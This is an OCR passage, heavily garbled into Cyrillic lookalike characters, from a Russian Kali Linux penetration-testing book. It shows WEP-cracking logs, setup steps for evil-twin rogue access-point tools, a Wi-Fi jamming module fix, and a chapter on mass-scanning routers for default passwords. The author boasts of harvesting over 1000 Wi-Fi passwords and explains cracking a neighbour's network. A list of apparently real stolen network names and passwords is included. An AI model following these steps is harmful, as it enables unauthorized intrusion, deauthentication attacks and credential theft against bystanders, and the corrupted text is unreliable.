( 11*о сіопе) 

і 

ХОК 

= 

Р9 

і 

РІ 

= 

06 1 

1068 

ігатез 

ѵггі-іеп 

іп 

18158 

ГП5 

2014-10-02 

14:52:12 

Оіізеі 

64 

( 13% сіопе) 

і 

ХОК 

= 

Р9 

і 

РІ 

= 

2А | 

276 

ігатез 

ѵггі-іеп 

іп 

4694 

П15 

2014-10-02 

14:52:13 

Оіізеі 

63 

( 16% сіопе) 

і 

ХОК 

= 

90 

і 

РІ 

= 

64 | 

529 

ігатез 

ѵггі-іеп 

іп 

8993 

т 5 

2014-10-02 

14:52:14 

Оіізеі 

62 

( 19% Нопе) 

і 

ХОК 

= 

9С 

і 

РІ 

= 

00 

476 

ігатез 

ѵгі-і-іеп 

іп 

8085 

ГП5 

2014-10-02 

14:52:17 

Оіізеі 

60 

( 25% Нопе) 

і 

ХОК 

= 

56 

і 

РІ 

= 

СО 1 

546 

ігатез 

ѵггі-іеп 

іп 

9288 

тз 

2014-10-02 

14:52:18 

Оіізеі 

59 

( 27% сіопе) 

і 

ХОК 

= 

Р7 


РІ 

= 

00 1 

269 

ігатез 

ѵгі-і-іеп 

іп 

4575 

тз 

2014-10-02 

14:52:19 

Оіізеі 

58 

(30% сіопе) 

і 

ХОК 

= 

01 


РІ 

= 

00 1 

519 

ігатез 

ѵггііеп 

іп 

8827 

тз 

2014-10-02 

14:52:20 

Оіізеі 

57 

( 33% сіопе) 

і 

ХОК 

= 

05 

і 

Рі 

= 

00 1 

365 

ігатез 

ѵгі-і-іеп 

іп 

6203 

тз 

2014-10-02 

14:52:23 

Оіізеі 

56 

( 36% сіопе) 

і 

ХОК 

= 

14 

і 

РІ 

= 

00 1 

799 

ігатез 

ѵгіііеп 

іп 

13576 

тз 

2014-10-02 

14:52:25 

Оіізеі 

55 

( 38% сіопе) 

і 

ХОК 

= 

4А 

і 

Рі 

= 

00 1 

742 

ігатез 

ѵгіііеп 

іп 

12613 

тз 

2014-10-02 

14:52:27 

Оіізеі 

54 

(41% сіопе) 

і 

ХОК 

= 

2Е 

і 

Рі 

= 

00 

407 

ігатез 

ѵгіііеп 

іп 

6925 

тз 

2014-10-02 

14:52:29 

Оіізеі 

53 

(44% сіопе) 

і 

ХОК 

= 

57 

і 

Рі 

= 

01 1 

392 

ігатез 

ѵгіііеп 

іп 

6655 

тз 

2014-10-02 

14:52:34 

Оіізеі 

52 

( 47% сіопе) 

і 

ХОК 

= 

83 

і 

Рі 

= 

00 

979 

ігатез 

ѵгіііеп 

іп 

16643 

тз 

2014-10-02 

14:52:40 

Оіізеі 

51 

(50% сіопе) 

і 

ХОК 

= 

Он 

і 

Рі 

= 

А8 

1235 

ігатез 

ѵгіііеп 

іп 

21011 

тз 

2014-10-02 

14:52:42 

Оіізеі 

50 

( 52% сіопе) 

і 

ХОК 

= 

73 

і 

Рі 

= 

со і 

539 

ігатез 

ѵгіііеп 

іп 

9147 

тз 

2014-10-02 

14:52:43 

Оіізеі 

49 

( 55% сіопе) 

і 

ХОК 

= 

43 

і 

Рі 

= 

ЕС 1 

263 

ігатез 

ѵгіііеп 

іп 

4487 

тз 

2014-10-02 

14:52:44 

Оіізеі 

48 

( 58% сіопе) 

і 

ХОК 

= 

87 

і 

Рі 

= 

88 

318 

ігатез 

ѵгіііеп 

іп 

5391 

тз 

2014-10-02 

14:52:44 

Оіізеі 

47 

( 61% сіопе) 

і 

ХОК 

= 

Е9 

і 

Рі 

= 

93 | 

312 

ігатез 

ѵгіііеп 

іп 

5306 

тз 

2014-10-02 

14:52:45 

Оіізеі 

46 

( 63% сіопе) 

і 

ХОК 

= 

22 

і 

Рі 

= 

6Р | 

479 

ігатез 

ѵгіііеп 

іп 

8147 

тз 

2014-10-02 

14:52:47 

Оіізеі 

45 

( 66% сіопе) 

і 

ХОК 

= 

85 

і 

Рі 

= 

02 1 

605 

ігатез 

ѵгіііеп 

іп 

10285 

тз 

2014-10-02 

14:52:50 

Оіізеі 

44 

( 69% (Іопе) 

і 

ХОК 

= 

2 А 

і 

Рі 

= 

00 

825 

ігатез 

ѵгіііеп 

іп 

14020 

тз 

2014-10-02 

14:52:52 

Оіізеі 

43 

( 72% сіопе) 

і 

ХОК 

= 

ВЗ 

і 

Рі 

= 

01 і 

763 

ігатез 

ѵгіііеп 

іп 

12983 

тз 

2014-10-02 

14:52:53 

Оіізеі 

42 

( 75°. сіопе) 

і 

ХОК 

= 

30 

і 

Рі 

= 

00 і 

279 

ігатез 

ѵгіііеп 

іп 

4732 

тз 

2014-10-02 

14:52:54 

Оіізеі 

41 

( 77% сіопе) 

і 

ХОК 

* 

50 

і 

Рі 

= 

04 1 

510 

ігатез 

ѵгіііеп 

іп 

8669 

тз 

2014-10-02 

14:52:55 

Оіізеі 

40 

( 80% сіопе) 

і 

ХОК 

= 

28 

і 

Рі 

= 

06 | 

184 

ігатез 

ѵгіііеп 

іп 

3130 

тз 

2014-10-02 

14:52:55 

Оіізеі 

39 

( 83% сіопе) 

і 

ХОК 

= 

РО 

і 

Рі 

= 

00 1 

230 

ігатез 

ѵгіііеп 

іп 

3906 

тз 

2014-10-02 

14:52:56 

Оіізеі 

38 

( 86% сіопе) 

і 

ХОК 

= 

63 

і 

Рі 

= 

08 1 

418 

ігатез 

ѵгіііеп 

іп 

7119 

тз 

2014-10-02 

14:52:57 

Оіізеі 

37 

( 88°. сіопе) 

і 

ХОК 

= 

69 

і 

Рі 

= 

01 і 

508 

■ргатез 

ѵгіііеп 

іп 

8623 

тз 


2014-10-02 14:53:20 - ОесгруіесІ раскеі заѵесі іп /. 5ѴѴогкз/5аѵесІ/0есгурІесІАРР_00026Р900000.сар 
2014-10-02 14:53:20 - Сеіііпд АКР Оеіаіі.... Оопе... 

Оесгуріесі ІР Асісіг 192.168.0.100 

Оесгуріесі Саіеѵау 192.168.0.1 

2014-10-02 14:53:20 - Кеузігеат (ХОР) раскеі заѵесі іп /. 5ѴМогкз/5аѵесІ/Кеу5Ігеат_00026Р000000. хог 
2014-10-02 14:53:20 - Рогдіпд АКР Раскеі: ѵііН ІР аз 192.168.0.100 апсі Саіеѵау аз 192.168.0.1 Оопе. . . 

2014-10-02 14:53:20 - СНорсЬор АКР геріау раскеі заѵесі іп / . 5УМогкз/ИАЮР5/1тр/СНорсЬор. сар 
[.] 2014-10-02 14:53:20 - Аисііііпд Ассезз Роіпі [ 00:02:6Р: 00:00:00 ] изіпд [ Іпіегасііѵе АКР Керіау (бепегаіесі АКР) 1 теіЬосІ... 

2014-10-02 14:53:20 - Сотріеіесі іп 73з (0.44 Ьуіез/з) 

2014-10-02 14:53:25 - СаріигесІ ІѴз 85 [Каіе О ІѴз/5ес] . Веасоп : 699 АР Роѵег : -80 сІВт і і 


СНорсЬор воспроизведение: 


ш 

5е1ес1 ап орііоп ( 0 
Зеіесіесі ==> 01 

- Кеіигп ) : 01 



[ і] 

А ргеѵіоиз сіесгуріесі 

АКР Рііе апсі кеузігеат маз РоипсІ. 




Ѵои (Іо поі пеесі Іо гедепегаіе а пей кеузігеат адаіп. 



ш 

Ргосее(І іо изе іЬіз 1 
Зеіесіесі ==> V 

< Ѵ/п ) : V 




2014-10-02 14:57:39 - 

Іізіпд Оесгуріесі АКР Рагкеі /. 5ѴМогкз/5аѵесІ/0есгуріесІАКР_00026Р000000. сар 




2014-10-02 14:57:39 - 

■ Сеіііпд АКР Оеіаіі.. йопе... 




ОесгуріесІ ІР Асісіг 

192.168.0.100 




Оесгуріесі Саіеѵау 

192.168.0.1 




2014-10-02 14:57:39 - 

Цзіпд Кеузігеат (ХОК) раскеі : /. 5ѴМогкз/5аѵесІ/Кеуз1геат_00026Р000000. хог 




2014-10-02 14:57:39 - 

Рогдіпд АКР Раскеі ѵііН ІР аз 192.168.0.100 192.168.0.1 ... 

йопе... 



2014-10-02 14:57:39 - 

СНорсЬор АКР геріау раскеі заѵесі іп /. 5ѴМогкз/НАІОРЗ/ітр/ СНорсЬор. сар 



[.! 

2014-10-02 14:57:39 - 

Аисііііпд Ассезз Роіпі [ 00:02:6Р: 00:00:00 ] изіпд [ Іпіегасііѵе АКР Керіау 

(бепегаіесі АКР) ! 

1 теіЬосІ. . . 


2014-10-02 14:57:43 - 

СаріигесІ ІѴз 16664 [Каіе 453 ІѴз/Зес], Веасоп : 2470, АР Роѵег : -45 сІВт (СоосІ) 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


СНорсНор выбор: 


[і] Аисііііпд Иепи [МЕР] 


[.] 


В55І0 
Е55Ю 
Епсгурііоп 
СНаппеІ 
Рігзі 5ееп 
Іпіегіасе 
Мопііог 
АТК ІРасе 
Сар Рііе 
ѴУР5 Сод 
Зідпаі 


00:24:01:00:00:00 

Тее! 

МЕР / МЕР ' 
б 

2014-10-27 21:28:25 

ѵІап2 

ѵІтопО 

аітопО [ 


0-І_іпк РІР-855 - КоіЛег [Таімап] 


Роѵег 
І_азі 5ееп 
] ОШ 

] от 

] 0111 


16 Асііѵе 

0:00:04 адо 


-25 сІВт Веасопз 

2014-10-27 21:28:44 5ееп 

МЕІКО [Упі-Еесі Кіпдсіоті [3] 

ІІпкпоѵп 

Зитзипд Саіаху 52 19100 (Мига! а) [Эарап] 
/ . 5УМогкз/МА10Р5/!тр/МЕР_002401000000_ТМР-01 . сар [ Зіхе : 69.25 КВ ] 
/еіс/геаѵег/002401РРА1С1.ѵрс [ Роа : ] 

‘25 сІВш 


Ра! а 
Сііеп! з 


37 Ас!іѵе 

2 


[?] 


1 - 3!ор Аис1і!іпд 

2 - РеаиіН АІ1 

3 - І_із! сііеп! з 

4 - Зрооі МАС Асісігезз 

- Сіозе аіі а!!аскіпд !егтіпа! 

- 1_ізі заѵесі АРР геріау іііез [ ] 

- 1_ізі аИ сар!игес! іііез [ ] 

- оокир РаіаЬазе Нізіогу 

- АиіНепіісаііоп НеіНосі [1 • Раке АиіНепіісаііоп] 

- Раке АиіНепіісаііоп (1 Тіте) 

• АІІаск НеіНосі [2 • Ігг!егас!іѵе Реріау] 

- Іп!егас!іѵе №іигаІ Реріау * 

- Іп!егас!іѵе 0841 Реріау (РеЬгоасісазі) 

15 - Іп!егас!іѵе 0841 Реріау (5епсІ Веасоп) 

- Іп!егас!іѵе АРР Реріау [ ] 

- АІІаск НеіНосі [3 • АРР Редиез!] 

А1 - АРР Редиез! Реріау * 

О • АІІаск НеіНосі [4~7 А!1аск НеіЬосІ] • Но! геасіу 

01 - КогеК СНорсНор А!!аск 

03 - Са!е-1_а!!е А!!аск [ Сііеп!-Огіепіесі] 

• МЕР Сгаскіпд НеіНосі 

- Зіапсіагсі МеіНосі [АН Вііз] 

- 10 Нех / 5 СНаг [64 Вііз] 

- 32 Нех / 16 СНаг [152 Вііз] 
с 6 - Когек Сгаскіпд МеіНосі 

- ЕпаЫе І_аз! 2 КеуЬуіез Вгиіеіогсе 
- Резіаг! Аисііііпд 

О - Реіигп 

Зеіесі ап орііоп ( - Реіигп ) : оі 

Зеіесіесі ==> 01 


Р2 - Раке АиіЬепіісаііоп (Сопііпоиз) 

12 - Іпіегасііѵе 0841 Реріау (Мосііііесі) 

- Іпіегасііѵе 0841 Реріау (68/86 АРР) 

- Іпіегасііѵе 0841 Реріау (Сіеаг-То-Зепсі) 

2 - АРУ 3 Редиез! Реріау (Ехізііпд АРР) 

- Ргадтепіаііоп АІІаск 

04 - Нігіе АІІаск [ Сііеп!-Огіепіе 


- 26 Нех / 13 СНаг [128 Вііз] 

- 58 Нех / 29 СНаг [256 Вііз] 

- ЕпаЫе 1_азі КеуЬуіе Вгиіеіогсе 
С9 - МЕР-Ресіоак Мосіе 


ЗѵіІТѵѵіпАІіаскег 

Домашняя страница: ННрзУ/йИНиЬ.сот/РОсІДЬз/ЗѵіІТѵѵіпАНаскег 

Этот инструмент создаёт мошенническую точку доступа ѴѴі-Рі, якобы для обеспечения 
беспроводных услуг Интернет, а на самом деле следящую за трафиком. 

Программные зависимости: 

• Рекомендуется использовать на Каіі Ііпих. 

• ЕНегсар. 

• Ззізігір. 

• АігЬазе-п§ включённая в аігсгаск-п§. 

• ОНСР. 


• ІМтар. 

Установка и запуск ЗѵіІТѵѵіпАІіаскег 


1| 

ссі ~/орТ 

21 

§І1: сіопе Ьі1р5://§ііЬиЬ.сот/Р0сІ_4Ь5/ЗѵіІТѵѵіпА1:1:аскег 

3| 

ссі ЗѵіІТѵѵіпАІіаскег 

4| 

сНтосІ +х іпБІаІІ.зІі 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


5 1 

./іпБІіаІІ.зИ —іпзТа II 

Запускаем: 

1| 

руіііоп ЗѵіІТѵѵіп-АІТаскег.ру 

Или так (на Каіі Ыпих): 

1| 

руіііоп /изг/5Ііаге/ЗѵіІТ\л/іпА1:1:аскег/ЗѵіІТѵѵіп-А1:1:аскег.ру 

[установка ОНСР в ОеЬіап и производные] 

ІІЬипІи: 

1| 

$ 5ис)о арІ-§е1: іпзіаіі ізс-сіііср-зегѵег 


Каіі Ііпих: 


арІ-§е1: іпзіаІІ ізс-сІЬср-зегѵег 


[установка ЭНСР в гегіНаІ и производные] 

Ресіога: 


$ зисіо уит іпзіаіі сІИср 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


ЗѵіІТюіп-АЫаскег ѵО.5.8 


Мосіиіе Ехіга 

ОеаиіИ АКаск 

СІгІ+ѴѴ 

РгоЬе Ведиезі 

СІгІ+К 

-й Мае СНапдег 

СІГІ+М 

Ф Эеѵісе РіпдегРгіпТ 

ан+с 

?• йНСР 5. АПаск 

СІгІ+Н 

[>N5 Зроо^ М. 

СІгІ+Т 

( * ѴѴіпсІоѵѵз Іірсіаіе АКаск 

СІГІ+Ы 

'■* Агр Розіоп АІТаск 

сін+д 

О ЗеШпдз 

СІгІ+Х 

гсі Узі: ѵѵіапі 


О 51агТ АКаск 


51ор АНаск 



Ііпзеі 

Домашняя страница: ИТ1:р5://яі1:ИиЬ.сот/ѵк496/Ііп5е1: 

Ііпзеі: — это Баш скрипт атаки методом "злой двойник" (ЕѵіІ Тѵѵіп АМаск). 


Установка и запуск Ііпзеі 


У этой программы есть ряд зависимостей. Часть необходимых для неё компонентов 
уже присутствуют в Каіі Ыпих (либо вы ставили их для других программ). Но часть 
необходимо предварительно установить. Для Кали это следующие пакеты: 


1 


ар1-§е1 іпзіаіі ізс-сіітср-зегѵег ІІ§Ы:1:рсІ тассІтап§ег рНр5-с§і тассНап§ег-§1:к 


На других дистрибутивах может возникнуть необходимость установить 
дополнительные программы. Ііпзеі: при запуске сама проверит, что установлено, а что 
нет и выведет соответствующий список. 


Далее как обычно: 


1| 

ссі ~/орТ 

2 1 

§І1: сіопе Ыі:р5://§і1:ЬиЬ.сот/ѵк496/Ііп5е1: 

3| 

ссі Ііпзеі: 

4| 

сігтосі +х Ііпзеі: ./Ііпзеі: 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Как работает Ііпзеі 

• Сканирует сети 

• Выбирает сеть 

• Захватывает рукопожатие (можно использовать без рукопожатия) 

• Мы можем выбрать один из нескольких веб-интерфейсов 

• Делается фальшивая ТД, подражающая оригиналу 

• На фальшивой ТД создаётся йНСР сервер 

• Создаётся 0Ы5 сервер для перенаправления всех запросов на Хост 

• Запускается веб-сервер с выбранным интерфейсом 

• Запускается механизм проверки валидность паролей, которые были введены 

• Деаутентификация всех пользователей сети, в надежде, что кто-то подключится 
к фальшивой ТД 

• Атака прекратиться, как только проверка выявит правильны пароль 


Глава 25. ГСоиіег Зсап Ьу Зіаз'М на Каіі Ыпих (взлом роутеров и 
ХЛ/і-Рі в промышленных масштабах) 

Между прочим, этот самый Коиіег 5сап от Зіаз'М — потрясающая штука! Перечень его 
функций вы можете посмотреть на официальной страничке . Мне же больше всего 
нравится в этой программе: 

• сканирование, при котором показываются как роутеры, так и другие аппаратно- 
программные элементы (камеры, серверы и пр.) 

• перебор типичный паролей для найденных роутеров 

• использование эксплойтов для ряда роутеров 

• если получилось подобрать пароль или сработал эксплойт, то парсится вся 
информация, которую удалось достать. А это, обычно, логин-пароль, пароль от 
ѴѴі-Рі, данные локальной сети и т. д. 

Программа уникальна тем, что, в лучших традициях графических интерфейсов, нужно 
нажать одну кнопку и она всё сделает сама. Никаких знаний не нужно. 

Программа мне понравилась до такой степени, что я стал искать альтернативы для 
Ыпих. Альтернатив я не нашёл. 

Но главная идея этой программы — сканировать сеть и искать роутеры с дефолтными 
паролями или со слабыми прошивками — мне показалась настолько потрясающей, что 
захотелось сделать что-то подобное для Ыпих. Это задача средней сложности, т. е. 
вполне достижимая. Благо большинство модулей уже есть готовые: птар (для 
сканирования портов) + сигі (для аутентификации и применения эксплойтов) + §гер 
(для парсинга страниц аутентификации (при определении модели роутера) и парсинга 
паролей и прочих полезных вещей при удачном подборе пароля/применении 
эксплойта). 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


У меня даже получилось сделать рабочий концепт, который насобирал для меня за 
день более 1000 паролей \Л/і-Рі. Концепт получился жутко медленным: сканер написан 
на РНР, причём написан без каких либо оптимизаций — всё делается в один поток, да 
при этом сканер реализован на попытке установить сокетное соединение. Т.е. если 
соединение происходит — значит начинает пробовать стандартные пароли и вынимать 
информацию из роутера в случае успеха. Если соединение не происходит — то 
программа ждёт, пока пройдёт время по таймауту. Понятно, что чаще соединение не 
происходит и, как следствие, почти всё время программа ждём окончания таймаутов. 
Всё это можно ускорить и оптимизировать, добавить новые модели роутеров. В 
общем, если за лето будет достаточно времени, чтобы доделать (хоть на базе птар, 
хоть на базе РНР) до уровня «не стыдно показать исходный код», то обязательно 
поделюсь своими наработками. Благо что алгоритмы эксплойтов, которые 
применяются в сканере роутеров от Зіаз'М, доступны в виде исходных текстов и их 
вполне можно переписать под сигі. 


1271 

9.86.34 

\Ѵіге1е85 

Ьприкіопсок 

1272 

9.92.99 

\ѵіге1е5« 

0026690854 

1273 

9.62.205 

\ѵпа(пісЬа 

шбббббб 

1274 

9.91.213 

\Ѵ№>Х 

02112642 

1275 

9.91.214 

\ѴХРХ 


1276 

9 62.82 

\Ѵпѵеі48 

2244668800 

1277 

9.89.196 

\ѴоКЬг 

141232360 

1278 

9.88.223 

\ѵогапіІ 

0819381845 

1279 

9 88.234 

лѵогашг 


1280 

9.65.14 

\ѴОКАРАТНА 

266679408 

1281 

9.89.234 

\ѴКРР 

267455852 

1282 

9.69.4 

ѵѵиі.к 

ьага\ѵиі2821 

1283 

9.68.70 

\ѵшЪ 

25072507 

1284 

9.88.97 

ѵѵупп’я Ьоте 

Веіггс220 

1285 

9 88.108 

ѵѵушЛХѴв Ьоте 


1286 

9.64.114 

ХОЯЕАМ 

266901586 

1287 

9.65.217 

XXX 

267068170 

1288 

9.65.230 

XXX 

аА®778899 

1289 

9.69.68 

Ѵаті 

266888107 

1290 

9.97.92 

Ѵатза 

0925519026 

1291 

9.82.74 

уапуопд 

265435450 

1292 

9.84.41 

уауее туЛеаг 

0865498836 

1293 

9.61.93 

уеаг77 

266629532 

1294 

9.88.181 

уеіуеаЬ 

а'ісЩГуЗ 

1295 

9.73.154 

Ѵіітѵііапка 

11692906 

1296 

9.84.253 

уте 

0865065038 

1297 

9.83.60 

Ѵ1112 

25172514 

1298 

9.83.83 

У1112 


1299 

9.93.27 

ѴтгРІогаІ 

022415119 

1300 

9.92.127 

Ѵо1іаііВ.еЬе11 

267421583 

1301 

9.71.188 

ѴЦРА 

00042528 

1302 

9.82.10 

2ее1ю! 

266625965 

1303 

9.82.12 

2ееЬоІ 


1304 

9.89.232 

гееДіап 

0859308557 

1305 

9.75.41 

2ЕМІСК 

028845016 

1306 

9.89.30 

[іРІоок] 

іГ1оок190114 

1307 

9.89.47 

[іРІоок] 


1308 

9 82.130 

)аугу 

266529641 


гг 


ТГ^ Т 
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Тестирование на проникновение с помощью Каіі Ыпих 2.0 


Вернёмся к Воиіег 5сап от Зіаз'М. Он шикарный! С его помощью вы сами можете 
насобирать уйму паролей от роутеров, от сетей ѴѴі-Рі и узнать много нового о сетях и об 
обитающих там устройствах. 

Если вы пользователь ѴѴіпсІоѵѵз, то для вас всё совсем просто — скачиваете, запускаете, 
вводите диапазон адресов и ждёте окончания сканирования. 

Для пользователей Ыпих также возможен запуск программы Коиіег 5сап от Зіаз'М под 
\Л/іпе. Я покажу как это сделать на примере Каіі Ыпих. 


Установка \Л/іпе в Каіі Ыпих 

Внимание, если у вас Каіі 2.0, то перейдите к инструкции " Установка ѴѴіпе в Каіі Ыпих 
2 . 0 ". 

Если посмотреть информацию о пакете ѴѴіпе в Каіі Ыпих, то там будет указано, что 
пакет уже установлен. Если попытаться его запустить, то выясниться, что это всего- 
навсего заглушка, которая и рассказывает как провести установку. Вся установка 
делается тремя командами: 


1| 

сІрк§ -асІсІ-агсЫіесІиге І386 

21 

арІ-§е1: ирёаіе 

3| 

ар1-§е1: іпзТаІІ \л/іпе-Ьіп:і386 


Далее скачиваете Воиіег 5сап от Зіаз М (Ьі:1:р://5І:а5согр.сот/ІоасІ/1-1-0-5б), 
распаковываете (в любое место), кликаете правой кнопкой по файлу ВоиІегЗсап.ехе, в 
контекстном меню выбираете «Открыть с помощью ѴѴіпе...», а дальше всё как на 
ѴѴІПСІОХЛ/5. 

Вот пример работы Коиіег 5сап от Зіаз'М в 1_іпих (сканирую диапазоны адресов моего 
родного города Муром): 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


Только хорошие результаты: 


Д им 


Поиісг 5сап ѵ2.51 Ьу 51а*'М 




ваг | Маа.ІЬеаЛ 5ипр»«: + | - | 

ЕпІыІРіапдкЬзяап: Е 1 * 1 - 1 > 1 5вм* 

! (і.Ѵ. ТІ Тюі Іо аыкЬ._ 

)•■. 

5сатлпдпкхМк 

VI РсцМг 5с ап |тап> 

[1 1 
_ , ссруг^ісам'мсир.гоіі 

>У*п 1 {<Гмгмп гпп 

108.35.24.0/22 «0«* 1 1 

193.106.141.6/22 1 .- Л 

195,20.194.0/23 -I <МапМапі> 

І-- - 

ниі» іаѵа зв’ѵіу. 


вм»та5[«В йосй ЧпЛі 15мгсЬ ВвяЛі | 



Если кто-то не до конца уловил принципы работы программы: 

• программе не нужен ѴѴі-Рі приёмник или что-то ещё — она работает по 
проводному соединению; 

• чтобы попытаться взломать соседский \А/і-Рі (а не на другом конце света), то 
нужно знать ІР соседа или, хотя бы, диапазон ІР интернет-провайдера соседа. 
Можно воспользоваться вот этим сервисом, чтобы узнать диапазоны 
принадлежащих провайдерам ІР, либо диапазоны ІР населённых пунктов. 


Если ещё кому-то понадобиться отфильтровать диапазоны ІР с сайта ір§еоЬазе.ги, то 
можно сделать так: 


1 


сигі -5 ШІ_' | §гер -о -Е ’[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3} - [0-9]{1,3}.[0-9]{1,3}.[0- 
9]{1,3}.[0-9]{1,3}' > сІіар_ір.1:х1: 


Где вместо 'ШИ' введите адрес страницы на ір§еоЬа$е.ги, которую нужно пропарсить. 


Глава 26. Чиним \ШМаттег и Ѵ\/іЯ_0о5 в ѴѴеЬЗрІоіІ 


\ШМаттег не работает (сбрасывается через несколько секунд) 


Если вы прямо сейчас попытаетесь воспользоваться модулями ѴѴКМаттег или 
Ѵ\/Ш_0о5 в \Л/еЬ5рІоіІ, то вас ждёт разочарование — после настройки всех опций и 
попытке запуска, модули вылетают через пару секунд. Те, кто читают ѴѴеЬѴѴаге.Ыг, 
наверное, уже догодались, что проблема в изменении имени интерфейса, которая 
произошла после обновления покета аігсгаск-п§. А ещё более догадливые уже могли 
попробовать сделать так: 


1 


5еІ топ ѵѵІапОтоп 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


К сожалению, этот фокус не работает: 


\ \ //II II (_) I 

\ \ А / / I I _II _І |_ 

\ \/ \/ / _ \ \/ _| \| |/ _ \| | _| 
\ А / _/ |_) \_ \ |_) | | (_) | | |_ 
V V \_ І_-_/| _/ -_/|_|\_ /|_|\_І 


- -=[МеЬ2рТ.оі1: РгатеМогк 
+—**— ==[Ѵег5Іоп : .5 ВЕТ 

+—**— ==[СосІепате :Ме'ге N01: Сгуіпд Ѵ/оІТ 

+ —**—==[ АѵаіТаЬІе МосІиТѳз : 19 

- —[УрсІаТе Раіе : [ ] 


КО РезсгірТіоп 


уез Мігеіезз ІпТегТасе Мате 
уез ТагдеТ В25Ю Асісігезз 

уез ТагдеТ Е55Ю Мате 

уез МопіСог МосІ(сІеТаиІІ:) 

уез ТагдеТ СЬаппеІ МитЬег 


§1 > изе міті/ѵѵіТі^ аттег 
зР і МіРі^аттег > зИом орТіопз 


ОрТіопз 

Ѵаіие 

іпТегРасе 

ѵЛапѲ 

ЬззісІ 


Ѳ55ІСІ 


топ 

топѲ 

сКаппе! 

11 


ызР : Ыі-Гі_1аттег > зеТ топ ѵЛапѲтоп 

МОИ => ѵЛап 

мзТ : Ѵі/іТі Іаттег > I 


Дело в том, что в скрипте установлен размер принимаемой строки и имя обрезалось до 
ѵѵіап... Какая нелепая смерть. 

Давайте отремонтируем наш ѴѴН'Маттег, а заодно уж и \Л/Ич_0о5. 


Прежде чем приступить, сделаем резервную копию файла, который мы сейчас будем 
редактировать(все записывается в одну строку): 


1 


саі /изг/зІіаге/ѵѵеЬзрІоіі/тосІиІез/ѵѵИ'і^аттег.ру > 
/изг/зНаге/ѵѵеЬзрІоіі/тосІиІез/ѵѵИ'иаттег.ру.Ьак саТ 
/изг/зІіаге/ѵѵеЬзрІоіі/тосІиІез/ѵѵіІ'иаттег.ру > 
/изг/зНаге/ѵѵеЬзрІоіі/тосІиІез/ѵѵИ'иаттег.ру.Ьак 


А теперь откройте файл /изг/збаге/ѵѵеЬзрІоіі/тосІиІез/ѵѵН'Уаттег.ру 


1 


ѵіт /изг/зІіаге/ѵѵеЬзрІоіі/тогіиІез/ѵѵіІ'Уаттег.ру 


Найдите там строчки: 


1| 

еІИ" сот[0:7] =='зе1: топ': 

2 1 

орбоп$[3] = сот[8:12] 


И замените на (заменять нужно только вторую строку, первая дана для ориентации в 
тексте программы): 


1| 

еМТ сот[0:7] =='зе1: топ': 

2 1 

орбоп$[3] = сот[8:] 
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Тестирование на проникновение с помощью КаМ Ыпих 2.0 


#! /изг/Ьіп/ѳпѵ руіЬоп 

# 

# іл/еЬЗріоіі Егатемогк МіТі Іаттег тосіиіе 

# СгеаіесІ Ву ѲхѲріітѲиз (Рагсііп АИаЬѵегсІіпагЬапсІ) 

# Етаіі : ѲхѲріітѲизфСтаіі .Сот 
ітрогі оз 

ітрогі зиЬргосезз 
ігот соге ітрогі: ѵлгоіогз 
ігот соге ітрогі Ьеір 
ігот ііте ітрогі зіеер 

орііопз = ["ѵЛапѲ", "топО", "11"] 

сіеТ \л/ііі_і аттег() : 
і гу: 

1іпе_1 = мсоіогз .соТ.ог.і1ШЕВІ_ + мсоіогз .соіог.ВШЕ + "\л/зі" + мсоіогз .соіог.ЕМОС 
1іпе_1 += ":" 

1іпе_1 += ѵѵсоТ.огз.со1.ог.ІЮЕКІ_ + мс оі о гз. соіог.ВШЕ + "Іл/ііі_.1аттег" + мсоіогз .соіог.ЕМРС 
1іпе_1 += " > " 
сот = га\л/_іприі(1іпе_1) 
сот = сот.іомегО 
іі сот[0:13] == 'зеі іпіѳгіасѳ': 
орііопз[0] = сот[14:] 
ргіпі "ІІІТЕВЕАСЕ => ", орііопз[0] 

Ѵі/ііі_] аттег() 

еііі сот[0:9] == 'зеі ЬззісГ : 
орііопз[1] = сот[1Ѳ:] 
ргіпі "В55Ю => ", орііопз] 1] 
ѵ\/ііі_] аттег() 

еііі сот[Ѳ:9] =='зеі еззісі': 
орііопз[2] = сот [10:] 
ргіпі "Е85Ю => ", орііопз[2] 
мііі_] аттег() 

еііі сот[0:7] =='зеі топ': 
орііопз[3] = сот|8:[] 
ргіпі "МОМ => ", орііопз[3] 

\л/ііі_] аттег() 


Перезапустите \Л/еЬ5рІоіі и уже прямо сейчас можете работать с ѴѴИ'Маттег. Конечно 
же, теперь не забывайте вводить зеі топ ѵѵІапОтоп. 


у/зі > изе ѵуіТі/ѵуіТі_] аттег 

цзі : Міі1_1аттег > зеі топ ѵЛапѲтоп 

МОМ => ѵ/ІапѲтоп 


\Л/іЯ_0о5 не работает (выдаёт ошибку через несколько секунд после 
начала работы) 

\Л/Нч_0о5 — он перестал работать ещё раньше. 

Сразу после запуска он выдаёттакую ошибку: 


1| 

ТгасеЬаск (тозі гесепі саІІ Іазі): 

21 

РІІе "/изг/Ьіп/уѵеЬзрІоіі", Ііпе 160, іп <тосІиІе> 

3| 

5іагі() 

4| 

РІІе "/изг/Ьіп/ѵѵеЬзрІоіі", Ііпе 158, іп зіагі 

51 

таіп() 

6| 

РІІе "/изг/Ьіп/ѵѵеЬзрІоіі", Ііпе 132, іп таіп 

71 

таіп() 
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81 

Рііе "/изг/Ьіп/ѵѵеЬзрІоіР", Ііпе 122, іп таіп 

91 

ѴѴІТІ_СІО 5 .ѴѴІТІ_СІ05 () 

10| 

Рііе "/изг/зІтаге/ѵѵеЬзрІоіі/тосІиІез/ѵѵіРі^оз.ру", Ііпе 31, іп \л/іРі_сІ05 

111 

\Л/ІТІ_СІ05() 

121 

Рііе "/изг/зІгаге/ѵѵеЬзрІоіі/тосІиІез/ѵѵі^сіоз.ру", Ііпе 27, іп \л/іТі_сІ05 

131 

ѵѵіТі_сІ о з() 

141 

Рііе П /и5г/5Ііаге/\л/еЬ5рІоі1:/тос)иІе5/ѵѵіРі_с)о5.ру", Ііпе 39, іп \л/іТі_сІ05 

151 

ѴѴІТІ_СІ05() 

16 

